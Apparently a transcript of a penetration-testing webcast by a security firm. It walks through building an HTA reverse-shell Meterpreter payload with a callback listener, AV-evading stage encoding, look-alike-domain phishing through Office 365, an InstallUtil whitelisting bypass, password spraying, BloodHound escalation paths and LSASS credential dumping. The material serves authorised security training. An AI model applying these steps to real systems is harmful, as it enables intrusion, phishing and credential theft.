we have we have one of the testers that is supposed to go to Disney World this weekend. Bad news. I feel kind of sad.
Who's going to Disney?
Rick.
Oh.
Oh, what?
Yeah, I feel sad because it's like, what do you do? Like, you have all the tickets booked, you have everything ready to go, and I guess the airline said that he could divert his route, but he had to end up at the same place. So, well, hopefully, Danny says the weekend should be good. So hopefully, it doesn't, because I think they're going for like the whole week. So, yeah.
Well, Joff's in Puerto Rico right now, so.
Is it hitting Puerto Rico?
I think it did.
Oh, wow. Wow. Oh, and Bob says, come up to New York, Beau. We can shack up in the basement. Shack up.
That sounds like an interesting proposal.
Right? For everybody that's getting on this, I'm logged in as John. Obviously, this isn't John. This is Sierra. John was having some problems, but I had to use his login and to start this meeting. So we're here with Beau and Brian. And as usual, I'm just going to kind of comment on your questions or comments that you type into the question box. And then Brian and Beau will take it up and they'll pause. If you guys have more questions, then I'll ask them when they get to a good stopping point. So, hey, are you guys ready?
I think so. I think I'm ready to go.
Okay, are you recording it, Brian?
I am. Yep.
Okay, so we're recording it, so it will be available later this week.
Cool. Awesome. So I think we're good to go. Can you guys see my screen?
Yep.
Okay.
Yes.
Awesome. Let's start this PowerPoint. Let's figure out how to use PowerPoint. All right. Cool. Does the GoToWebinar box pop up over what I'm showing? Or do you just see the...
No.
Okay, cool. So make sure. Awesome. Sweet. Thanks. Greetings, everyone. I am Brian from Black Hills Information Security, and as Sierra mentioned, we also have Beau Bullock on that will be presenting as well. And then Sierra will be helping field questions and all that other good stuff. So for this webcast, we just kind of wanted to go through some of the techniques and tools that we use for when we're doing pivot tests on networks, internal pivot tests for companies. In addition, we're also going to look at some command and control, I guess, methods, both generating up payloads as well as delivering those payloads. And then I'll also talk a little bit about application whitelisting, bypassing. And then after that, I'll hand things off to Beau. He'll go through a bunch of really cool pivoting stuff. He'll go over the awesome new tool that he's been working on, Mail Sniper. If you guys haven't seen it, then you are in for a big treat. And then we'll go ahead and we'll wrap things up. So let's get started. Talking about command and control. So when you hear this, you might also hear it referred to as C2, just kind of as an abbreviation. What is C2? Well, really what this is there's a few key items here. C2, establishing a command and control channel, is something that can allow us to do remote command execution on a computer. So we can basically remotely control that computer as if we were sitting right at it, right in front of it. It allows us to basically just take control over it. The other things we can do is we can upload our files to the system. So if we need to upload other payload, we need to upload scripts, we can do that usually with a C2 channel. The other thing that's really helpful is to be able to grab files off of that system. So say maybe we do a dump of the LSAS process without using Meterpreter, Mimikatz, whatever, and we want to go ahead and we want to grab that dump file off, we can transfer that out. Maybe we found some sensitive data, credit card files, stuff like that, and we can go ahead and we can use the C2 channel to exfiltrate that data from the system to our own local machines. So how do we establish these C2 channels? Well, there's multiple different payloads that are available to us. Usually, though, there's going to be two essentially different forms of the payloads that you're going to be using. You're either going to be using some kind of an interpreter payload, or you're going to be using some kind of a PowerShell Empire payload. Now, the way in which you package that and deliver it is going to change. You have a bunch of different forms you can deliver it in. You can deliver it as an HTA file, you can deliver it as a .bat file, you can try to deliver it as an executable if you want to, macro document, lots of different forms that you can deliver these. But really underneath what you're delivering is you're typically delivering some kind of an interpreter C2 shell or a PowerShell Empire type C2 channel. And in case you're wondering, as Beau pointed out, yes, I literally Googled the word establish to get that screenshot. Generating payloads. So there's also two big ways that we typically use to generate up our payloads. We'll either use the MSF Venom command line utility, which is available in Kali Linux by default. And there's also the PowerShell Empire framework itself that you can use to generate up payloads. So I'm going to go ahead and I'm going to show you guys generating up a payload by using MSF Venom. So live demo, cross your fingers, cross your legs, cross whatever else you have. Can you guys still see my screen?
Yep, looks good.
Cool.
Yeah,
Excellent. So I am in a Kali box right now. First thing I'm going to do is I'm going to type ifconfig. I'm going to get my IP address here. So I'm just running this locally. Normally you'd have this out on some kind of a public-facing server if you were wanting to do this on a company. So you'd need a public IP address here. For my test lab, I'm just going to use my internal one. And then I'm going to try the following command, MSF Venom -P, which stands for payload. I'm going to use the Windows x64 interpreter, or meterpreter, as a client pointed out to me, they pronounce it, meterpreter. And I'm going to use the reverse _ TCP payload type. Got to set a couple options here. I'm going to use lhost, and that's just going to be my IP address, 192.168.1.108. Lport, I'm going to go ahead and use 443. That's a pretty safe one. And then for format, I'm going to use the HTA-PSH format output. Move this out of the way. Cool. And so what that's going to be, it's going to be a .hta file that essentially just executes the PowerShell. It runs a PowerShell command that will then execute the shell code to get me a interpreter session on the box on which it's executed. Again, there are lots of different formats that you can use. This is just the one that I'm using right now. HTA is essentially HTML application. It's pretty sweet. It's something developed by Microsoft, and when you run it, as we'll see later, it actually comes up with a little window that'll show you that it's published by Microsoft. It's pretty cool. So anyways, -F for format, HTA-PSH. I'm going to give it the -O flag for the output. And let's go ahead and let's just call this policies.hta. So here I'm not using any encoding, I'm not doing anything special. Just going to generate up this payload. Cool. All right, it's been generated. So we can do a quick ls and see here, we've got it. Let's go ahead and clear the screen. ls, we see we've got our policies.hta. All right, cool. So next thing I'm going to do is I'm going to go ahead and I'm going to start up a listener for this. So to do that, I'm going to do MSF console. Take a second. Ruby's loading up. It's grinding the gears. All right, awesome. So I'm in here. In Metasploit, so MSF console is just a console for Metasploit. I've been asked before, you know, what's my familiarity with Metasploit? What do I use Metasploit for? I really don't use Metasploit for all that much, except for the listener, so this multi-handler option, and sometimes the SMB login option. Other than that, I don't really use Metasploit a lot, just because there aren't many cases anymore where you're going to run into that exploits. There's actually exploits available that, you know, you find a vulnerability on a client system that you can actually exploit through Metasploit. It still happens, but it just doesn't happen that often. And to be quite honest, most of the time we don't need to go through that route. So this is the main thing I really use the Metasploit for. It's this multi-handler. So I'm going to type use multi/handler. Now I need to set a couple options. So first thing, I need to set a payload. And this payload needs to match the one that I used when I generated up that HTA file. So I'm going to do set payload Windows x64 meterpreter reverse _ TCP. Give it a second while Ruby grinds the gears. All right. I'm going to set lhost. For this, I actually normally just do 0.0.0.0. That's just telling this that it go ahead and listen on all interfaces. Set lport 443. That needs to match the port that you set when you generated up your payload. So let's see if I can move this to the center of the screen. There we go. All right. Next, I'm going to set a couple other options. I'm going to set exit on session. I'm going to set that to false. That tells me that when I get a session, keep the listener open. And so you can actually have multiple sessions established to multiple computers simultaneously. Next, I'm going to do set enable stage encoding to true. And I'm going to set my stage encoder to x64 XOR, which is the XOR is the only encoder available for the x64 payload. Now, the stage encoding is important. A lot of times now, it's easy to get around the first. So basically, when we drop this payload, there's two portions of it. The first portion is called the stager. This is going to be what we're going to deliver to our target. When the target runs this, it creates a process in memory, and then it calls back to our listener to grab down the rest of the payload. So it stages, and then it calls back to our listener, it grabs the second stage. What we see a lot is that we can get that stager to bypass AV, but a lot of AV, especially semantic, is really good at catching the second stage if you don't encode it. So if you don't use the stage encoding, what you might see is you might see a connection coming back, but then it's going to fail to actually establish a session. That's most likely your second stage getting caught by AV. It's really important to go ahead and set this. So I'm going to do run-j. J just means job. For when you set this exit on session false, you just got to run it as a job. Okay, so now that's running. Next thing I'm going to do is I'm going to deliver this up. From another window, you can see I've got my policies.hta file. So I'm going to serve this up with a Python simple HTTP server. And I'm just going to set port 8080. Okay, now it's serving up, listening on port 8080. Go over to my Windows machine. No, I don't want Windows Explorers. Internet Explorer is my default. All right, so I'm going to go 192.168.1.108, port 8080. Maybe.
Hey, while that's loading, Brian, we got a question.
All right, what is the question?
What encodings work best for your payload to perform evasion?
So for the initial, if you're talking about initial encoding for the payload, I typically don't even mess with that. I know that I've heard good things about veil evasion, but usually I just don't even bother with encoding the first stage. I just try to find essentially another. I try not to use. I guess like the raw executables that get generated, those are usually going to get caught. If you use something like an HTA file or a .bat file or something like that, PowerShell type file, you usually don't have to worry about encoding the initial stager. And then for the stage encoding, so encoding that second stage, as I mentioned, for 64-bit payloads, the XOR encoder is actually the only one that's available for that.
Hopefully that answered that question.
Yes. All right. So we've got the, all right, so now I've got access to my Kali box serving up. There's the policies.hta file. Let's go ahead and save it. All right, so we run, it says unknown publisher. Go ahead and click run. So if you do it with Internet Explorer, it would actually say Microsoft's your publisher. For some reason it didn't pop up there. All right, hop back over here. We can see that it sent the encoded stage, although it says stage encoder failed. I'll talk about that in just a second. But we do have a session. So to interact with it, I'll do session-i1, and I can do sysinfo, and we can see I've got a session on that box. So I can pop a shell if I want to. Who am I? You know, you can do all kinds of fun stuff, right? All right, so going to background this. I'm going to go ahead and kill the session. So you'll notice that stage encoder failed. Bummer, right? Well, I actually have a fix for that. This fix has just been officially merged into the Metasploit repo. So within the next, I don't know, month or two, it'll probably finally make its way down to the Kali boxes. For now, though, if you want to fix it yourself, here's a quick way to do it. So use Vim or whatever your editor of choice is to open up user, share, Metasploit framework, modules, encoders, x64 xor.rb. Head on down to here, and just above this def decoder stub, add in the following lines. Def can preserve registers, question mark, tab in, true, end. So that's it. Just add in those 3 lines into that file that I mentioned there. Basically all it is that in Metasploit, they require that the encoders be able to preserve register states when you use it. And if this function isn't available, saying at least that it can, even though here it's kind of a lie because it's not going to, but it doesn't really matter. But if this isn't available, then the encoder is going to fail. So again, this is officially merged into the Metasploit repo, so you'll see the changes soon. If you go out and do a git pull, if you installed it yourself, then you'll get this. So go ahead and add that in, exit out, restart up Metasploit console. Hop back into multi-handler, set my payload, set my L host, set my L port, set exit on session to false, set enable stage encoding to true, set stage encoder again to the only one that's available and the one that we just fixed. There are more available for the 32-bit 32-bit stages, but or 32-bit payloads. I'm sorry, but for 64-bit it's just the XOR. Let's go ahead and run. Cool. Let's hop back over here. All right, so you see this time it works. So it encoded with x64 XOR encoder. So now that stage is actually encoded. So again, if you're running this, you're not using stage encoding, or if you try to use the stage encoder, the broken version of it, and you're not getting a session, but you're seeing this, sending encoded stage or whatever, look into that. Make sure you implement that fix, and you'll probably get a lot better luck there. So, so that's pretty much just a quick demo of how you can generate up a payload and deliver it. HTA files are becoming pretty popular. AV is starting to catch up on that, but there's still, it's not being detected everywhere.
Brian, we have a couple questions.
Sure thing.
The first one is, what approach would you take to pivot to a Win2K12 DC if you had access to a user machine where no admin had logged into the system before?
How would I pivot to the Win2K? All right, so in terms of all the pivoting stuff, that's going to come up later during Beau's talk. So I'm not going to, I'll let Beau get to that a little bit later, but you'll see basically what we call the 5 steps to domain administrator. So you'll see that coming up. So just hang tight.
Okay, cool. And then what version of AV is running on the sample target machine?
No version. Actually, I think I have Windows Defender running, is all that's running on there. Yep. Cool. All right. Next. So, so that's cool and all. We've got our payload. I showed you how to set up the listener, how to get a session, but how do we actually deliver this payload? Well, phishing, definitely. I mean, this is still going to be a very popular, very successful method. A lot of times when you're talking to people about hacking, and people who are wanting to get into it, and a lot of people just want to run a couple commands and have control of the system, and they think that social engineering just isn't really an aspect of that, whatever. But no, definitely, this is one way that we are still seeing most organizations are getting compromised is through some kind of phishing, some kind of social engineering campaign. Why? Because it works. It's not that difficult to implement, and you're probably going to be able to get in, and you're probably going to have a lot less chance of getting caught than if you throw a vulnerability scanner at someone's network and try to find exploits and all that good stuff. But the thing is that we're seeing a lot of attachments. A lot of times attachments are being blocked, regardless of what that attachment is. Even with the .hta files, we're seeing a lot of companies blocking documents with macros in them, which used to be pretty popular. So how do we get our payload in? Well, one of the things I really like is GoDaddy.com. I absolutely love them. They're cheap, they're easy to use, their DNS records update almost immediately, and it's just fantastic. So one thing you can do is go out and sign up for a domain that's similar to your target. So here I'm going to be targeting us. I tried to sign up for blackhillsinfosec.com and it's like, oh, it's taken. But for the low price of $2.99, you can have blackhillsinfosec.info. Okay, sweet, let's grab it. So after you do that, you can go ahead and you can set up an A record, which I have down there redacted out. But anyways, I've set up the A record for this server to point to, or for this domain to point to my C2 server. So that when you go and you type in blackhillsinfosec.info, it goes to my C2 server. Now, if you go and try and do that right now, you're just going to end up going to Google's name server. I changed it before the presentation because, I know what people are going to try to do. So just don't. But anyways, point it to your server. And the next thing other reason I really like GoDaddy is that it's really easy to get set up with Office 365 email to also be affiliated with your domain. Now, a lot of times when you go to do the checkout, this will just be an extra option. A lot of times it'll actually just be included by default, which you can see in this screen here when I signed up. So I got a free month of Microsoft Office 365. Why is it good to have the Office 365? Well, when you do this, it ends up using Microsoft's email servers. For a lot of companies, by default, or within their email policies, they actually whitelist emails that come from Microsoft's email servers. So, you can go out and you can try to send out phishing emails from your own servers, from your own domains, all that stuff. But if you're doing that, there's chances are it's going to get blocked just based on reputation, just about the fact that, maybe you haven't been around your domain hasn't been around that long. That a couple other issues associated with that. But if you use Microsoft Office 365 instead, I found that most of the time it will get through those filters. Next, find an employee of your target company. Searching around, this John Strand guy looks like a good target. So I went ahead and selected him. And I created an email with his name. So I went ahead and just used john@blackhillsinfosec.info. All right. So next.
Share password, so.
What's up?
You guys share password, so.
Oh, yep. So next is next step. Once you've got all that set up, we want to go ahead and gather up some contacts for your target company. One thing I suggest using is Bing LinkedIn Cache module from Recon NG. This can get you a bunch of potential contacts for you to fish, for you to play around with in a very short amount of time. And it does it just by using Bing's API. It doesn't actually touch LinkedIn, so if you're worried about scraping information off of LinkedIn and getting sued, like one of the 100 people that they targeted within the last month or so to file a lawsuit, you don't have to worry about that because you're not actually scraping their site when you're using this module, which is quite nice. So you got that, you pick a few targets, go ahead and set up an email, and you can email them with a link that points to the payload that is hosted on your server. So just like you saw in my demo, I was able to host up that payload on my Kali VM. You could do the same thing. With your external C2 server, and you just point that link to that payload. So for instance, here you can see up top, I've generated up the payload, I'm serving it up with a simple HTTP server, and then I've written myself an email from John, basically says, there's some policy changes, go check this out, document viewing program, and if I don't, then he's going to egg my house, which isn't out of the realm of possibility. So I click that, and it goes to blackhillsinfosec.info, port 8080, policies.hta. It downloads the file. Will ask me if I want to download it. I do download it. Now here's that screen that I was talking about. A lot of times this is what you'll get when you run an HTA file. You'll actually get this pop-up that says that the publisher is Microsoft Windows. Why they did this, I have absolutely no idea. But the fact is this exists, and for some users this will add some legitimacy to this application. And so here, again, we can see after I've up at the top, that's the log from actually accessing and getting that policies.hta file from my server. And then down below is the actual connection that's being made. So any questions so far?
Yes, we do have a couple.
Okay.
Somebody would like you to repeat where the RB file and the function can preserve registers should be added.
Okay. Tell you what, so we've got this recorded. And I'll also go ahead and just do like a quick blog post for the next day or two that just shows that. If you go on to Metasploit, like the Metasploit repo on GitHub, and look through their pull request, you should be able to find the one that I did though. But basically, it's user share Metasploit framework encoder or modules encoder x64 XORRB or something. But I'll post that up later.
Okay. And again, it is recorded for everybody who it might be going a little fast, but you can rewatch it.
Yep.
Another question was, how realistically would one get to the policy file onto the Windows box past the firewall and C2 back through the firewall?
Very realistically. So that payload delivery that I just went through in terms of setting up your domain, setting up an email account for that, and then sending in the phishing email where you send in a link that points to your server. I've had, every time I've used that on a phishing campaign, it works. So the way that it gets out of the firewall is by creating a reverse connection. So as long as they have egress that's allowed outbound via port 80 or port 443, which is almost always the case on every network, most networks we've been through, even with proxies in place, that will work. So chances of success, very high.
Cool. And then what was the migration into Notepad for? It looked like there was a post-exploit script which ran dealing with PowerShell and Notepad.
Yes, excellent eye. So that step I left out, but basically when you set up your multi-handler, you can tell it to run a script automatically once a session is created. Here, I just told it to run the migrate script, and what that does is as soon as it gets a session, it will spawn up a Notepad process and it will migrate to that process so that even if the user closes down like the HTA window or they close down that process, that original process that spawned, you'll still have a session as long as they don't close down the Notepad process.
Cool. And then also someone asked that AV isn't good at detecting these, but how about solutions like FireEye?
FireEye, good question. So ran into that recently on a recent test, and FireEye is actually pretty good at detecting a lot of this stuff, especially if you're going to be using PowerShell type commands. FireEye is probably going to see that, and it's probably going to alert on that, which makes it a little bit more difficult to get these in if they are running FireEye. So, but the application whitelisting thing I'm going to talk about next is one way that once you're actually on the box, that you can get around some of that alerting that's in place.
Cool.
Yep. Awesome.
All right, I think you can move ahead.
Okay, cool. Sounds good. So application whitelisting, so it's a good segue into this. Basically, we're seeing this more and more on tests that we're doing. Application whitelist is essentially, rather than saying which programs are not allowed on your network, you go through and you say explicitly which programs can be run on your network, which programs can be run on your different systems. And the main benefit over this, in my opinion, is that you don't have to sit there and try to add a new rule for every single piece of malware that comes out, like what a lot of AV engines do. And I mean, they're pretty good at trying to keep up with these signatures, but the fact is that it's extremely difficult to do so. I mean, there's so many new malware samples being generated every single day. And on top of that, people come up with more and more clever ways to get around these different detection mechanisms. And so rather than worrying about that, a lot of companies are just trying to go with a whitelisting approach that just says, look, you can only run Internet Explorer, you can only run Explorer.exe, and this different stuff. So how do we get around this? There's quite a few methods. I would say definitely the person at the forefront of a lot of this work is Casey Smith. Awesome guy. His handle there, sub T. And so that's the demo I'm going to be demoing here. So one of the really nice things that, in addition to getting around whitelisting restrictions, is that this will also get around environments where they have restricted the use of PowerShell, they've restricted the use of cmd.exe, and it would also help get around some of the alerting that's in place for FireEye. Now there is a way to, there's another method that I've been working on that kind of deals with this a little bit, that for getting into the network initially, you can also get around things like FireEye, but we'll talk about that kind of in a different segment or blog post. But for now, I'll just show you the basic, once you're on the box, kind of what can you do? Oops, no, I don't want to leave the webinar. All right. Cool. And so for this, I'm actually just going to refer to my blog post. So a lot of times when I'm on a test, I'll just hop on and just do BHIS PowerShell without PowerShell. If you Google that, you'll get this. And I'm just going to use this to grab the commands off of here. Two things I'm going to do. So first, basically what we're going to do here is we're going to create a C# program. And the way that we're going to create the C# program is a little bit special. So I'm going to grab this whole thing here. And now when I did this blog post, I promised you guys a demo video. Well, that's what we're getting right here. So I'm just going to give you the whole walkthrough for those who have been looking at this but haven't quite been able to get it. We'll do that walkthrough right here. So I'm going to go through, I'm going to grab that whole file, paste it in here. I'm going to go ahead and save it to the desktop as a C# source file. I'm just going to call this imb cs.cs. All right. And so, so what's special about this is that we're going to use, we have this installer method, and we're actually going to use the uninstall method. So normally when you execute a program, when you write a C# program and go to execute it, it's going to hop into this main function. Whatever's in main, that's where it's going to start executing. And that's where it's going to get stopped by a lot of application whitelisting. So I don't have application whitelisting on this machine. I'll go ahead and say that. You just got to kind of take my word for it. We have tested this out and it does work. But what we're going to use instead is rather than start from this main function, we're actually going to start with this uninstall function here. So the way that we're going to use a utility called install util, we're going to run that, and that's going to allow us to call code from this uninstall function. And this does get around a lot of whitelisting, application whitelisting. So when we run that, it's going to call this function mycode.exec. The exec function is down here. And basically what this is going to do is it's going to read in a PowerShell file, a PowerShell script, and it's going to execute it. So the script I'm going to do, I'm going to do scan.ps1. And what that is, another thing I like to do, search Beau Bullock, all ports, top link, and I'm going to grab out Beau's awesome egress filter check. So go ahead and copy that. I'm going to paste this in. I'm going to save it to the desktop as scan.ps1. Save. All right, cool. The only change I'm going to make is here, I'm going to get rid of the select string, and I'm going to do out file, point it to my desktop. All right, so I've got that. I got this. All right, so next, I need to compile and run my program. So to do that, I'm just going to scroll down a little bit here till I get to this portion right here. So here I'm using this program. It's called csc.exe. It's actually the C# compiler. And basically, as long as you have the .NET framework installed on your computer, you probably have the csc.exe file as well as the install util, which we'll be using shortly. So to grab that, rather than run it from the command line, I'm going to use another trick that we figured out that will help get around environments where they have cmd.exe locked down. I'm going to hop into Windows, Microsoft.NET, Framework 64, version 2. I'm going to go down, I'm going to grab the csc.exe file, which is right here, and I'm going to create a shortcut. Tells me, oh, you can't create a shortcut here, but would you like to put it on the desktop instead? Sure, let's do that. All right, so I'm going to go ahead and open this up. Properties. And I'm going to go back here. I'm going to grab from the /r all the way to the end. Hop in a notepad, turn it into a single line. And I'm going to change powerup.exe to imb_cs.exe. You don't have to, but I'm just going to go ahead and change it to be that. That's just the output file name. All right, copy that. Paste that on the end of the line here. And so what I'm doing here is when I double click this shortcut, what happens is it actually just goes out and it just makes a call to this target. So it goes out and just makes a call to the csc.exe program. And then anything after that is actually command line arguments that are being passed into that program. So you want to be careful here because there is a limit to the length. So that's why I'm not actually going to put in the program name here. There's another trick for that, but basically, there's a length here, and this actually almost reaches that length limit. So you just want to be careful there. So I'm going to apply this and click OK. I'm going to grab my .cs file, and I'm just going to drop it on to that shortcut. And so when you drop a file onto a program, it actually passes in that file name as a command line argument. And so what just happened is I dropped that file on there. It went and looked at that target field of the properties. It executed that. It passed in these command line arguments. And then additionally, it passed in that file name as an argument as well. And you can see that it compiled the program, and here's my output. Cool. Now, how do we run it? Well, we run it using this install util under the same directory. Go ahead and grab it. I'm going to create a shortcut. Yes. Same deal. So properties, we're going to open that up. Head back over to my blog post. Go down here and grab this line. So you just need to grab the bottom part of it. Paste it on to the end. Click apply. OK. Cool. Now grab that program, the compiled output, drop it onto the install util, cross some fingers. Looks like it's running. I probably should have just done like a couple ports instead of 1,000 ports. But here you can see it's going through. I've got, need to clean up the output a little bit. But it basically looks like we got almost every single port that's open. Almost all of my egress ports are open. So there's that. But anyways, you get the point. So that is one way that you can actually bypass application whitelisting. You can bypass the restriction of cmd.exe, and you can also bypass environments where they not only have PowerShell locked down, but they also have alerting when you try to use PowerShell programs. So FireEye especially. FireEye did not pick up that I was using PowerShell when I was on that last test. They did not pick up that I was actually using PowerShell scripts when I ran it in this method. So you get kind of a lot all packed into one there. So before...
Quick question about that.
Yep.
Would internet whitelisting be a good mitigation for that, or is that application whitelisting?
As application whitelisting, internet whitelisting would be a good method to stop the initial payload delivery, like what I was talking about earlier. with
Okay,
signing up your
cool.
own domain and sending out the email and all that good stuff.
And then we had another quick question. What is the proxy auto config being used as proxy configuration?
Say that again. I'm sorry.
What if there is proxy auto config being used as proxy configuration?
Oh, for establishing the outbound session. So most of those should be like that should have proxy awareness with getting those out. Basically, as long as you might have, instead of using the TCP, you might have to use the HTTP payload. But I've seen in a lot of environments that'll still get around that. So.
Okay, cool.
Awesome. And so with that, I'm going to go ahead and pass things over to Beau to give him presenter. So make presenter. There you go.
Thank you, Brian.
Yep.
Let me show my screen. That was pretty awesome. Let's see, we've got about 20 minutes or so left. So again, if this seems a little speedy, sorry about that, but it is recorded. If you want to go check it later, you'll be able to obviously go through it at a slower pace. So I'm going to talk about internal network pivoting. Basically, at this point, what we're talking about when we talk about pivoting is the ability for an attacker who's gained a foothold in your organization. What can they get access to once they have a limited shell, something like Brian demonstrated with the HTA payload? Basically having sent a phishing email into an organization, gotten a shell on a system, or even maybe like a malicious insider who has access to a desktop, what can that person get to as a low-level user? What resources can they pivot to, and how can they escalate in the environment? A lot of the penetration tests that you hear about typically just run a vulnerability scan, and people just go through the results looking for criticals and highs and attempt to just exploit things. But when it comes to specifically Active Directory networks, a lot of times we don't have to run any vulnerability scans anymore. We can just use basically built-in tools to Windows to move around and ultimately locate sensitive data. So as I mentioned, living off the land is basically the name of the game when it comes to internal pivoting for us. We pretty much just use Windows command line and PowerShell exclusively now, just because in the past year or so, there's been so much awesome tooling that's been generated by the community for this specific purpose. So pretty much everything we can do is available to be done in these two formats. So John, our owner of our company, decided to throw domain admin 5 steps into the description for this webcast. So I decided to go ahead and throw together those 5 steps for you. Basically, on one of the last pivot tests I was on, I was able to actually escalate to domain admin in less than an hour, and you'll basically following this exact set of steps is how that happened. A lot of times it actually occurs faster than that, and in some cases it's actually like one step. Basically, there's a couple times where we'll find an administrative password and group policy preferences files, and basically are at admin at that point. But in this case, that was not what happened. But I will walk through these 5 steps for you, and I think they should translate over pretty well to most organizations. So step number 1. Password spraying, which if you've seen any of our webcasts before or read any of our blog posts, you've definitely seen us talk about password spraying because we're big fans of it. Password spraying is essentially the antithesis of brute forcing passwords against a single user account. So in the general sense of attacking passwords, most people think, let me try thousands of passwords against one account. The problem with that is you're quickly going to lock out accounts and you're not going to get any credentials. But if you do the opposite of that, you take a huge user list, a very pretty much all the usernames you possibly have access to, and try one password against all of them. Very often you'll find that somebody in that organization has chosen a poor password. Especially whenever you have weak password policies at play. The default for most Windows environments we go up against is 8 characters. So for specifically right now, this time of year, fall 2016 is hitting like a ton. And one way you can do that is I wrote a PowerShell script to do that. If you check it out, it's on GitHub. But basically, it will automatically go and grab all the usernames from a domain. As an authenticated user, will grab the usernames and then try the password you're choosing against all of those usernames, and then output that to you. So this is kind of what that looks like. You end up with a lot of results. This screenshot is not even half the size of the actual screenshot, or the actual output that came from this particular spray. Basically, I think I got like 54 credentials in a matter of an hour through password spraying. So trying like summer 16, autumn 16, fall 2016, and you can see like success, valid user account. And the reason you're seeing multiple passwords here, this particular domain had an account lockout policy that was valid, or the observation window was every 15 minutes. So basically, every 15 minutes, we tried one password. And these were the passwords that it chose. And you can see, you gain access to a ton of credentials this way. And so when it comes to trying to escalate in an environment, obviously having more credentials gives you more access to things. As you get more credentials, you find that different users have been added to different groups on the domain, and occasionally are administrative in some aspect on the network. So now that we've gathered a bunch of users' credentials, let's say we had not, at that point, gotten domain admin, which that actually does happen sometimes. We'll password spray and get domain admin that way. Could be just one step. Step two is to gather situational awareness data about the network. The tool that I'm absolutely in love with right now is Bloodhound from Adaptive Threat Division. This tool is amazing for finding an escalation path to domain admin. I think I tweeted something like it's basically the equivalent of video game speedrunning to domain admin. So what it does essentially is it'll enumerate all the local admins groups on every system in the domain. So you have a beautiful list of every single system's local admins group. Next, it will also enumerate all the active user sessions each one of those systems. So having the ability to know who's logged into every system on the domain essentially lets you know where you could potentially grab credentials of a specific user on a system. And then lastly, it'll gather all the group memberships from the domain. Once you have all the group memberships, you can then use Bloodhound to basically figure out where a user is a member of a nested group inside of a nested group inside of a nested group, that some random like higher level group actually has administrative access of some random system on the domain. And it makes this like beautiful GUI for you that you can basically click through and find the path. So, and again, like I said, it's super useful for blue teams too here. So, for example, you can one of the pre-built configurations is that it'll search and tell you the user account has the most sessions on the network, which that could be useful for a blue team if you wanted to see if like a specific attacker was pivoting around a lot and would be able to find out where they were. So now that we have all that information, let's find a path to an actual domain admin system. So to kind of show you what the GUI looks like with Bloodhound, down in the bottom right corner, we have a user that we have a credential of. So this is a guy that was one of the sprayed credentials that we got earlier. With Bloodhound, you can basically specify the starting node, meaning like that could be a user or host, and then your ending node, which would end up being like the group or the system or user that you want to gain access to. So in this specific case, we started with the user we have the credential of, and we wanted to figure out a path to the domain admins group. So as you can see, the domain admins group's in the top left. What Bloodhound did is it said, if you look at the bottom right, where I've got user we have a cred of, that user is a member of this group here. So you have group our user is a member of. That group is an admin to these two systems on the network. Both of these systems have a domain admin user either logged in or recently logged in. They basically recently had a session to these systems. So whenever we did that analysis of who had sessions to systems on the network earlier, it found that these two domain admins were logged into these systems. And if I'm an administrator of these systems, I can pivot there as an admin and potentially pull their credentials from memory. So having the ability to basically go through each of the user credentials that we gained access to via password spraying very quickly and find a path to this group with Bloodhound, it's like magic. It's awesome. So essentially, found a path to these systems, pivot to these systems, and then step 4 basically is pivoting, which there's a few different ways you can go about pivoting in a domain. Some of the main ways that we typically pivot would be like to use like interpreters, PS exec, or even PowerShell Empire. there's, you could straight up RDP if you wanted to. You could always schedule a task if you didn't want to actually RDP, or use basic exec. Or in some environments, you have VNC. But basically, once you get access to that system, the easiest way to dump creds is to use Mimikatz. So both Meterpreter and Empire have Mimikatz modules built in that will dump the credentials for you, making it very easy. Additionally, if you didn't want to run Mimikatz, if you just RDP to the system, Windows has a beautiful way built in to hand you the memory dump of the LSASS process you need to run Mimikatz against it offline. So to do that, you basically open up Task Manager. You right-click the LSASS process, click Create Dump File, and then you copy that dump file that it created off of that workstation to another system and run Mimikatz against it there. And you won't actually have to run Mimikatz against the system live. Proc dump does essentially the same thing. So if you have procdump.exe, or there's actually a PowerShell script out there that does the same thing, it will dump the LSASS process again, pull it offline, and you can pull the credentials from memory at that point. Or lastly, you could always just keylog the system and potentially just wait for the administrator to log in somewhere and have their credentials. So at that point, domain admin credentials obtained. 5 steps for you there. Hope that translates well. But getting domain admin should not be the end goal. There's a lot of companies that will basically get DA and then say, hey, we won, like that's the end of the game. That's not what we do. What we really focus on, and the reason is because we get DA a lot, we really try to focus on is finding a way to provide risk to a customer and show them like the true risk of being able to escalate to domain admin. Just getting domain admin to a C-suite member like a CEO or a CIO typically doesn't mean a whole lot. One of the things I noted here, so in the Mandiant M-Trends report from last year, or actually it was from this year, they reported that last year it took an average of 146 days to detect an attacker in a network. Now, 146 days is a long time to be able to stay, really like quiet on the network and move around and try not to get detected. Now, for us, pen tests are scoped much shorter. We typically have maybe like 5-10 days max for a typical engagement. And we have to be able to provide that same level of value in that short amount of time. So the way that we go about finding access to the AKA sensitive data on a network is pretty tough, but it's still doable. It's a little bit noisier, but I'm going to walk through a couple things that we typically do. So one of my favorite ways to find sensitive data quickly after escalating on network is to use a tool called PowerView from FarmJoy. PowerView has a few modules built into it. Specifically, one is called Invoke ShareFinder. The other is FileFinder. So ShareFinder will, as your current user, go out to the network and find all the shares on the network. And once you have that list of shares, you can then use FileFinder to go search through all of those shares for specific terms in the file names. So a lot of times, we'll search for, let's say, industrial control system or SCADA network or passwords or credentials. Search through all the file names in those shares for those terms and find, password.doc or, industrial control system network architecture.ls or whatever, on just a share on the network. And it helps us to find those, those sensitive files pretty quickly. Another thing we typically do is just straight up target the databases on the network, which, that can be kind of tedious because a lot of times, we'll find where an organization has a lot of databases, and in those cases, it can be time consuming just to look through those. So here's a few other things that I think help an attacker or a pen tester find sensitive data quickly. One is to just locate jump hosts, RDP jump hosts, because a lot of organizations, they rely on a single system to try to sections of the network. But if you can find those RDP jump hosts, you can typically find where the sensitive data is. So the way you do that is using PowerView from FarmJoy again. You can use get-net computers, get-net RDP sessions, and that will find all of the RDP sessions for every user on the network. And as you start to look through the list that it generates, if you find a specific system that has, let's say, 10 current RDP sessions, it's probably likely that's a jump host to get access to something. If you see 10 different users RDP to one system, it's probably important. So that's one technique for finding jump hosts. Another thing is finding access to like a virtualization hypervisor, something like vCenter, VMware vCenter. There's times where I'll get access to vCenter and log in, and you have just like an admin who is so awesome at organizing their environment, where like this list you see here, like they've literally organized all of the different sections of the organization into folders. So each set of servers is in their own folder. So you have like here's all the security servers in this folder. Here's all of our HR servers here. So here's all of accounting. When you get those, it makes it a lot easier to find sensitive data too. You find the databases, and you find Exchange servers. You find all the DCs. So again, finding access to a virtualization hypervisor is pretty awesome on Pentest. The next thing that I want to talk about is email. So email is something that is, 